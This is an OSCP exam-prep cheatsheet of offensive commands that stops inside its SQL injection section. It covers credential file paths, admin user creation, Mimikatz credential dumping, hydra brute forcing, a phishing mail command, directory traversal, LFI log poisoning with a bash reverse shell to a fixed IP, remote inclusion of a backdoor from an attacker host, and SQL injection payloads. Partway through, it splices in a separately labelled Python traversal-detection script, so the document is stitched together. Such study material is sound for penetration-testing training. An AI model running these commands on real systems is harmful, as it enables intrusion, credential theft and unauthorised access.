# OSCP Cheatsheet
- I prepared this cheatsheet as part of my OSCP preparation.
- I'll keep updating this.
- For any suggestions mail me at contact.saisathvik@gmail.com

# Table of Content
- [General](#general)
  - [Important Locations](#important-locations)
  - [File Transfers](#file-transfers)
    - [Windows to Kali](#windows-to-kali)
  - [Adding Users](#adding-users)
    - [Windows](#windows)
    - [Linux](#linux)
  - [Password-Hash Cracking](#password-hash-cracking)
    - [fcrackzip](#fcrackzip)
    - [John](#john)
    - [Hashcat](#hashcat)
  - [Mimikatz](#mimikatz)
  - [Ligolo-ng](#ligolo-ng)
- [Recon and Enumeration](#recon-and-enumeration)
  - [Port Scanning](#port-scanning)
  - [FTP enumeration](#ftp-enumeration)
  - [SSH enumeration](#ssh-enumeration)
  - [SMB enumeration](#smb-enumeration)
  - [HTTP/S enumeration](#https-enumeration)
    - [Wordpress](#wordpress)
    - [Drupal](#drupal)
    - [Joomla](#joomla)
  - [DNS enumeration](#dns-enumeration)
  - [SMTP enumeration](#smtp-enumeration)
  - [LDAP Enumeration](#ldap-enumeration)
  - [NFS Enumeration](#nfs-enumeration)
  - [SNMP Enumeration](#snmp-enumeration)
  - [RPC Enumeration](#rpc-enumeration)
- [Web Attacks](#web-attacks)
  - [Directory Traversal](#directory-traversal)
  - [Local File Inclusion](#local-file-inclusion)
  - [SQL Injection](#sql-injection)
- [Exploitation](#exploitation)
  - [Reverse Shells](#reverse-shells)
    - [Msfvenom](#msfvenom)
    - [One Liners](#one-liners)
    - [Groovy reverse-shell](#groovy-reverse-shell)
- [Windows Privilege Escalation](#windows-privilege-escalation)
  - [Basic](#basic)
  - [Automated Scripts](#automated-scripts)
  - [Token Impersonation](#token-impersonation)
  - [Services](#services)
    - [Binary Hijacking](#binary-hijacking)
    - [Unquoted Service Path](#unquoted-service-path)
    - [Insecure Service Executables](#insecure-service-executables)
    - [Weak Registry permissions](#weak-registry-permissions)
    - [DLL Hijacking](#dll-hijacking)
  - [Autorun](#autorun)
  - [AlwaysInstallElevated](#alwaysinstallelevated)
  - [Schedules Tasks](#schedules-tasks)
  - [Startup Apps](#startup-apps)
  - [Insecure GUI apps](#insecure-gui-apps)
  - [Passwords](#passwords)
    - [Sensitive files](#sensitive-files)
    - [Config files](#config-files)
    - [Registry](#registry)
    - [RunAs - Savedcreds](#runas---savedcreds)
  - [Pass the Hash](#pass-the-hash)
- [Linux Privilege Escalation](#linux-privilege-escalation)
  - [TTY Shell](#tty-shell)
  - [Basic](#basic-1)
  - [Automated Scripts](#automated-scripts-1)
  - [Sensitive Information](#sensitive-information)
  - [Sudo/SUID/Capabilities](#sudosuidcapabilities)
  - [Cron Jobs](#cron-jobs)
  - [NFS](#nfs)
- [Post Exploitation](#post-exploitation)
  - [Sensitive Information](#sensitive-information-1)
    - [Powershell History](#powershell-history)
    - [Searching for passwords](#searching-for-passwords)
    - [Searching in Registry for Passwords](#searching-in-registry-for-passwords)
    - [KDBX Files](#kdbx-files)
  - [Dumping Hashes](#dumping-hashes)
- [Active Directory Pentesting](#active-directory-pentesting)
  - [Enumeration](#enumeration)
    - [Powerview](#powerview)
    - [Bloodhound](#bloodhound)
    - [PsLoggedon](#psloggedon)
  - [**Attacking Active Directory Authentication**](#attacking-active-directory-authentication)
    - [Password Spraying](#password-spraying)
    - [AS-REP Roasting](#as-rep-roasting)
    - [Kerberoasting](#kerberoasting)
    - [Silver Tickets](#silver-tickets)
    - [Secretsdump](#secretsdump)
  - [Lateral Movement in Active Directory](#lateral-movement-in-active-directory)
    - [psexec - smbexec - wmiexec - atexec](#psexec---smbexec---wmiexec---atexec)
    - [winrs](#winrs)
    - [crackmapexec](#crackmapexec)
    - [Pass the ticket](#pass-the-ticket)
    - [Golden Ticket](#golden-ticket)


# General

## Important Locations

- Windows

```bash
C:/Users/Administrator/NTUser.dat
C:/Documents and Settings/Administrator/NTUser.dat
C:/apache/logs/access.log
C:/apache/logs/error.log
C:/apache/php/php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/php4/php.ini
C:/php5/php.ini
C:/php/php.ini
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
C:/Program Files (x86)/xampp/apache/conf/httpd.conf
C:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM
C:/Windows/repair/system
C:/Windows/repair/software
C:/Windows/repair/security
C:/WINDOWS/System32/drivers/etc/hosts
C:/Windows/win.ini
C:/WINNT/php.ini
C:/WINNT/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt
C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav
C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav
C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software
C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
```

- Linux

```bash
/etc/passwd
/etc/shadow
/etc/aliases
/etc/anacrontab
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/at.allow
/etc/at.deny
/etc/bashrc
/etc/bootptab
/etc/chrootUsers
/etc/chttp.conf
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/cups/cupsd.conf
/etc/exports
/etc/fstab
/etc/ftpaccess
/etc/ftpchroot
/etc/ftphosts
/etc/groups
/etc/grub.conf
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/httpd/access.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/httpd/srm.conf
/etc/inetd.conf
/etc/inittab
/etc/issue
/etc/knockd.conf
/etc/lighttpd.conf
/etc/lilo.conf
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/lsb-release
/etc/motd
/etc/modules.conf
/etc/mtab
/etc/my.cnf
/etc/my.conf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/npasswd
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/printcap
/etc/profile
/etc/proftp.conf
/etc/proftpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/putreftpd.pdb
/etc/redhat-release
/etc/resolv.conf
/etc/samba/smb.conf
/etc/snmpd.conf
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/sysconfig/network
/etc/syslog.conf
/etc/termcap
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/pure-ftpd.log
/logs/security_debug_log
/logs/security_log
/opt/lampp/etc/httpd.conf
/opt/xampp/etc/php.ini
/proc/cmdline
/proc/cpuinfo
/proc/filesystems
/proc/interrupts
/proc/ioports
/proc/meminfo
/proc/modules
/proc/mounts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc//cmdline
/proc//maps
/proc/sched_debug
/proc/self/cwd/app.py
/proc/self/environ
/proc/self/net/arp
/proc/stat
/proc/swaps
/proc/version
/root/anaconda-ks.cfg
/usr/etc/pure-ftpd.conf
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/apache/conf/modsec.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/audit_log
/usr/local/apache/error_log
/usr/local/apache/error.log
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.ini
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdn
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/httpd_log
/usr/local/Zend/etc/php.ini
/usr/sbin/pure-config.pl
/var/adm/log/xferlog
/var/apache2/config.inc
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/php.ini
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth.log
/var/log/boot
/var/htmp
/var/log/chttp.log
/var/log/cups/error.log
/var/log/daemon.log
/var/log/debug
/var/log/dmesg
/var/log/dpkg.log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim.paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/faillog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd-access.log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd/access.log
/var/log/lighttpd/error.log
/var/log/lighttpd/lighttpd.access.log
/var/log/lighttpd/lighttpd.error.log
/var/log/mail.info
/var/log/mail.log
/var/log/maillog
/var/log/mail.warn
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/proftpd
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/secure
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/mysql.log
/var/run/utmp
/var/spool/cron/crontabs/root
/var/webmin/miniserv.log
/var/www/html/__init__.py
/var/www/html/db_connect.php
/var/www/html/utils.php
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access_log
/var/www/logs/error_log
/var/www/logs/access.log
/var/www/logs/error.log
~/.atfp_history
~/.bash_history
~/.bash_logout
~/.bash_profile
~/.bashrc
~/.gtkrc
~/.login
~/.logout
~/.mysql_history
~/.nano_history
~/.php_history
~/.profile
~/.ssh/authorized_keys
#id_rsa, id_ecdsa, id_ecdsa_sk, id_ed25519, id_ed25519_sk, and id_dsa
~/.ssh/id_dsa
~/.ssh/id_dsa.pub
~/.ssh/id_rsa
~/.ssh/id_ecdsa
~/.ssh/id_rsa.pub
~/.ssh/identity
~/.ssh/identity.pub
~/.viminfo
~/.wm_style
~/.Xdefaults
~/.xinitrc
~/.Xresources
~/.xsession
```


## File Transfers

- Downloading on Windows

```bash
powershell -command Invoke-WebRequest -Uri http://:/ -Outfile C:\\temp\\
iwr -uri http://lhost/file -Outfile file
certutil -urlcache -split -f "http:///"
copy \\kali\share\file .
```

- Downloading on Linux

```bash
wget http://lhost/file
curl http:/// >
```

### Windows to Kali

```bash
kali> impacket-smbserver -smb2support .
win> copy file \\KaliIP\sharename
```

## Adding Users

### Windows

```powershell
net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /ADD
```

### Linux

```bash
adduser #Interactive
useradd

useradd -u -g #UID must differ from the existing ones; this form adds a user to a specific group
```

## Password-Hash Cracking

*Hash Analyzer*: [https://www.tunnelsup.com/hash-analyzer/](https://www.tunnelsup.com/hash-analyzer/)

### fcrackzip

```bash
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt .zip #Cracking zip files
```

### John

> [https://github.com/openwall/john/tree/bleeding-jumbo/run](https://github.com/openwall/john/tree/bleeding-jumbo/run)
>

```bash
ssh2john.py id_rsa > hash
#Convert the obtained hash to John format (see the *2john scripts at the link above)
john hashfile --wordlist=rockyou.txt
```

### Hashcat

> [https://hashcat.net/wiki/doku.php?id=example_hashes](https://hashcat.net/wiki/doku.php?id=example_hashes)
>

```bash
#Obtain the hash mode number from the example_hashes page above
hashcat -m hash wordlists.txt --force
```

## Mimikatz

```powershell
privilege::debug
sekurlsa::logonpasswords #hashes and plaintext passwords
lsadump::sam
lsadump::lsa /patch #both of these dump the SAM

#OneLiner
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

```

## Ligolo-ng

```bash
#Creating the interface and starting it
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up

#Kali machine - attacker machine
./proxy -laddr :9001 -selfcert

#Windows or Linux machine - compromised machine
./agent -connect :9001 -ignore-cert

#In the Ligolo-ng console
session #select host
ifconfig #note down the internal network's subnet
start #after adding the relevant subnet to the ligolo interface

#Adding the subnet to the ligolo interface - Kali linux
sudo ip r add dev ligolo

```

---

# Recon and Enumeration

- OSINT or Passive Recon
  - whois: `whois ` or `whois -h `
  - Google dorking
    - site
    - filetype
    - intitle
    - GHDB - Google hacking database
  - OS and service information using [searchdns.netcraft.com](https://searchdns.netcraft.com)
  - Github dorking
    - filename
    - user
    - A tool called Gitleaks for automated enumeration
  - Shodan dorks
    - hostname
    - port
    - Then gather information by going through the options
  - Scanning security headers and SSL/TLS using [https://securityheaders.com/](https://securityheaders.com/)


## Port Scanning

```bash
#use the -Pn option if you're getting nothing in the scan
nmap -sC -sV -v #Basic scan
nmap -T4 -A -p- -v #complete scan
sudo nmap -sV -p 443 --script "vuln" 192.168.50.124 #running vuln category scripts

#NSE
updatedb
locate .nse | grep
sudo nmap --script="name" #here we can specify other options like specific ports etc.

Test-NetConnection -Port #powershell utility

1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("IP", $_)) "TCP port $_ is open"} 2>$null #automating a port scan of the first 1024 ports in powershell
```

## FTP enumeration

```bash
ftp
#log in with valid creds, or check the nmap scan for anonymous login and log in with Anonymous:password

put #uploading file
get #downloading file

#NSE
locate .nse | grep ftp
nmap -p21 --script=

#bruteforce
hydra -L users.txt -P passwords.txt ftp #'-L' takes a username list, '-l' a single username; '-P'/'-p' work the same way for passwords

#check for vulnerabilities associated with the version identified.
```

## SSH enumeration

```bash
#Login
ssh uname@IP #enter password in the prompt

#id_rsa or id_ecdsa file
chmod 600 id_rsa/id_ecdsa
ssh uname@IP -i id_rsa/id_ecdsa #if it still asks for a password, crack the key passphrase using John

#cracking id_rsa or id_ecdsa
ssh2john id_ecdsa(or)id_rsa > hash
john --wordlist=/home/sathvik/Wordlists/rockyou.txt hash

#bruteforce
hydra -l uname -P passwords.txt ssh #'-L' takes a username list, '-l' a single username; '-P'/'-p' work the same way for passwords

#check for vulnerabilities associated with the version identified.
```

## SMB enumeration

```bash
sudo nbtscan -r 192.168.50.0/24 #IP or range can be provided

#NSE scripts can be used
locate .nse | grep smb
nmap -p445 --script="name" $IP

#In windows we can view like this
net view \\ /all

#crackmapexec
crackmapexec smb
crackmapexec smb 192.168.1.100 -u username -p password
crackmapexec smb 192.168.1.100 -u username -p password --shares #lists available shares
crackmapexec smb 192.168.1.100 -u username -p password --users #lists users
crackmapexec smb 192.168.1.100 -u username -p password --all #all information
crackmapexec smb 192.168.1.100 -u username -p password --port 445 --shares #specific port
crackmapexec smb 192.168.1.100 -u username -p password -d mydomain --shares #specific domain
#In place of username and password, we can pass usernames.txt and passwords.txt for password-spraying or bruteforcing.

# Smbclient
smbclient -L //IP #or try with 4 /'s
smbclient //server/share
smbclient //server/share -U
smbclient //server/share -U domain/username

#SMBmap
smbmap -H
smbmap -H -u -p
smbmap -H -u -p -d
smbmap -H -u -p -r

#Within SMB session
put #to upload file
get #to download file
```

- Downloading a whole share: if the folder contains several files, these smbclient commands download all of them.

```bash
mask ""
recurse ON
prompt OFF
mget *
```

## HTTP/S enumeration

- View the source code and identify any hidden content. If an image looks suspicious, download it and try to find hidden data in it.
- Identify the version or CMS and check for active exploits. This can be done using Nmap and Wappalyzer.
- Check `/robots.txt`.
- Look for the hostname and add the relevant one to the `/etc/hosts` file.
- Directory and file discovery - obtain any hidden files which may contain juicy information

```bash
dirbuster
gobuster dir -u http://example.com -w /path/to/wordlist.txt
python3 dirsearch.py -u http://example.com -w /path/to/wordlist.txt
```

- Vulnerability scanning using nikto: `nikto -h `
- SSL certificate inspection: this may reveal information such as subdomains and usernames.
- Default credentials: identify the CMS or service, look up its default credentials and test them.
- Bruteforce

```bash
hydra -L users.txt -P password.txt http-{post/get}-form "/path:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use the https-post-form mode for https; whether the form is POST or GET can be seen in Burpsuite. Also capture the response for detailed info.

#Bruteforce can also be done with Burpsuite but it's slow, prefer Hydra!
```

- If `cgi-bin` is present then fuzz further and obtain files like .sh or .pl
- Check whether other services with upload privileges (FTP, SMB or others) are reflected on the web server.
- API: fuzz further; this can reveal sensitive information

```bash
#identifying endpoints using gobuster
gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern #pattern can be like {GOBUSTER}/v1; v1 is just an example, it can be anything

#obtaining info using curl
curl -i http://192.168.50.16:5002/users/v1
```

- If there is any input field, check for **Remote Code Execution** or **SQL Injection**
- Check the URL to see whether we can leverage **Local or Remote File Inclusion**.
- Also check if there's any file upload utility (and find the location where the upload is reflected)

### Wordpress

```bash
# basic usage
wpscan --url "target" --verbose

# enumerate vulnerable plugins, users, vulnerable themes, timthumbs
wpscan --url "target" --enumerate vp,u,vt,tt --follow-redirection --verbose --log target.log

# Add a WPScan API token to get the details of vulnerabilities.
```

### Drupal

```bash
droopescan scan drupal -u http://site
```

### Joomla

```bash
droopescan scan joomla --url http://site
sudo python3 joomla-brute.py -u http://site/ -w passwords.txt -usr username #https://github.com/ajnik/joomla-bruteforce
```

## DNS enumeration

```bash
host www.megacorpone.com
host -t mx megacorpone.com
host -t txt megacorpone.com

for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found" #bash bruteforcer to find domain names by reverse lookup

dnsrecon -d megacorpone.com -t std #standard recon
dnsrecon -d megacorpone.com -D ~/list.txt -t brt #bruteforce, hence we provide a list

dnsenum megacorpone.com

nslookup mail.megacorptwo.com
nslookup -type=TXT info.megacorptwo.com 192.168.50.151 #we're querying a specific DNS server
```

## SMTP enumeration

```bash
nc -nv 25 #Version Detection
smtp-user-enum -M VRFY -U username.txt -t # -M means mode, it can be RCPT, VRFY, EXPN

#Sending email with valid credentials, the below is an example of a phishing mail attack
sudo swaks -t user1@test.com -t user2@test.com --from user3@test.com --server --body @body.txt --header "Subject: Test" --suppress-data -ap
```

## LDAP Enumeration

```bash
ldapsearch -x -H ldap:// -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC="
ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC="
#the CN describes the information we're collecting
ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Users,DC=<1_SUBDOMAIN>,DC="
ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC="
ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC="
ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC="
ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC="
ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC="
ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC="

#windapsearch.py
#for computers
python3 windapsearch.py --dc-ip -u -p --computers

#for groups
python3 windapsearch.py --dc-ip -u -p --groups

#for domain admins
python3 windapsearch.py --dc-ip -u -p --da

#for privileged users
python3 windapsearch.py --dc-ip -u -p --privileged-users
```

## NFS Enumeration

```bash
nmap -sV --script=nfs-showmount
showmount -e
```

## SNMP Enumeration

```bash
snmpcheck -t -c public
snmpwalk -c public -v1 -t 10
snmpenum -t
```

## RPC Enumeration

```bash
rpcclient -U=user $DCIP
rpcclient -U="" $DCIP #Anonymous login
##Commands within rpcclient
srvinfo
enumdomusers #users
enumpriv #like "whoami /priv"
queryuser #detailed user info
getuserdompwinfo #password policy, get the user RID from the previous command
lookupnames #SID of the specified user
createdomuser #Creating a user
deletedomuser
enumdomains
enumdomgroups
querygroup #get the RID from the previous command
querydispinfo #description of all users
netshareenum #Share enumeration, this only comes up if the user we're logged in as has permissions
netshareenumall
lsaenumsid #SID of all users
```

---

# Web Attacks

## Directory Traversal

```bash
cat /etc/passwd #displaying content through an absolute path
cat ../../../etc/passwd #relative path

# if the pwd is /var/log/ then in order to view /etc/passwd it will be like this
cat ../../etc/passwd

#In a web app, find a parameter and test it like this
http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd
#check for id_rsa, id_ecdsa
#If the browser does not render the output cleanly, use curl
curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd

#For windows
http://192.168.221.193:3000/public/plugins/alertlist/../../../../../../../../Users/install.txt #no need to provide the drive
```

- URL Encoding

```bash
#Sometimes the plain path is filtered, then we need to encode it
curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
```

- Wordpress
  - Simple exploit: https://github.com/leonjza/wordpress-shell

## Local File Inclusion

- The main difference from directory traversal is that here we are able to execute commands remotely.

```bash
#At first we need
http://192.168.45.125/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=whoami #we're passing a command here

#Reverse shells
bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1"
#We can simply pass a reverse shell to the cmd parameter and obtain a reverse shell
bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22 #encoded version of the above reverse shell

#PHP wrapper
curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,"
curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/backup.php
```

- Remote file inclusion
  1. Obtain a PHP shell
  2. Host a file server
  3. Include the hosted file through the vulnerable parameter:

```bash
http://mountaindesserts.com/meteor/index.php?page=http://attacker-ip/simple-backdoor.php&cmd=ls
#we can also host a PHP reverse shell and obtain a shell the same way
```
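Added defender-side example, not part of the original cheatsheet: a Python validator and access-log scanner that classify the `page=` values used in the Directory Traversal and Local File Inclusion sections above (encoded dots, absolute paths, Windows backslashes, `php://` and `http://` wrappers). The web root, the log lines and every function name are constructed assumptions.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlparse

# Assumed include directory of the application (constructed; not from the page).
WEB_ROOT = "/var/www/html/meteor/pages"

# Stream wrappers and remote schemes a page parameter should never carry;
# php://filter, data:// and http:// are the ones used in the LFI/RFI examples.
BLOCKED_SCHEMES = ("php://", "data://", "http://", "https://", "ftp://",
                   "file://", "expect://", "phar://", "zip://")

# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing, so %2e%2e and the
    double-encoded %252e%252e both collapse to '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_page_param(page, web_root=WEB_ROOT):
    """Return (verdict, resolved_path).

    verdict: "ok"        value resolves to a file inside web_root
             "wrapper"   PHP stream wrapper or remote URL (LFI/RFI)
             "traversal" value escapes web_root (../, encoded dots,
                         absolute path, Windows-style backslashes)
             "empty"     nothing supplied
    resolved_path is only set for "ok".
    """
    if not page:
        return "empty", None
    decoded = decode_fully(page)
    lowered = decoded.lower()
    if lowered.startswith(BLOCKED_SCHEMES) or "://" in lowered:
        return "wrapper", None
    # Treat backslashes as slashes so ..\..\ on a Windows host is not missed.
    normalised = decoded.replace("\\", "/")
    root = os.path.realpath(web_root)
    # os.path.join drops root when `normalised` is absolute, so /etc/passwd
    # lands outside root too; realpath collapses every ../ segment.
    candidate = os.path.realpath(os.path.join(root, normalised))
    if os.path.commonpath([root, candidate]) != root:
        return "traversal", None
    return "ok", candidate


def scan_access_log(lines, web_root=WEB_ROOT):
    """Classify every page= parameter found in access-log lines and return
    (verdict, raw_value, other_query_keys) for each non-ok request.
    other_query_keys exposes companions such as cmd= used in log poisoning."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        params = parse_qs(urlparse(match.group("target")).query,
                          keep_blank_values=True)
        for raw in params.get("page", []):
            verdict, _ = classify_page_param(raw, web_root)
            if verdict != "ok":
                findings.append((verdict, raw, sorted(k for k in params if k != "page")))
    return findings


# Constructed sample log lines mirroring the requests shown in the cheatsheet.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /meteor/index.php?page=about.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /meteor/index.php?page=../../../../../../../../../etc/passwd HTTP/1.1" 200 1432',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /cgi-bin/index.php?page=%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1432',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=whoami HTTP/1.1" 200 80',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /meteor/index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/backup.php HTTP/1.1" 200 900',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /meteor/index.php?page=http://attacker-ip/simple-backdoor.php&cmd=ls HTTP/1.1" 200 60',
]

if __name__ == "__main__":
    for verdict, raw, extras in scan_access_log(SAMPLE_LOG):
        print(f"{verdict:9s} page={raw!r} other_params={extras}")
```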
## SQL Injection

```bash
admin' or '1'='1
' or '1'='1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1 -
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1-
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1`='1-
```

- Blind SQL Injection: can be identified with a time-based payload

```bash
#The application takes some time to respond, here 3 seconds
http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- //
```

- Manual Code Execution

```bash
kali> impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth #To login
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
